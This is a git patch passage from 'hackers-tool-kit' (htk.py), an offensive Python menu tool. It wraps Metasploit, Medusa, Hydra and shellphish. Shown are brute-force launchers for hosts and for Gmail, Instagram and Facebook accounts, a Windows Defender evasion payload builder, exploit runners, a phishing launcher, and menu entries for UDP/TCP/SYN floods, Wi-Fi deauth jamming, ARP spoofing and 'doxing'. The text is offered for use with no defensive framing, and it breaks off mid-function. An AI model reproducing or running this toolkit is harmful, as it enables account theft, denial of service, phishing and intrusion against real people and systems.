sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - found = True -mainbanner() -main() From 1e7a22ee633bd83e0956a2cd13e7b79cc35b54e1 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 00:35:36 -0400 Subject: [PATCH 065/214] Add files via upload --- htk.py | 2024 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2024 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..2a477d9 --- /dev/null +++ b/htk.py @@ -0,0 +1,2024 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = 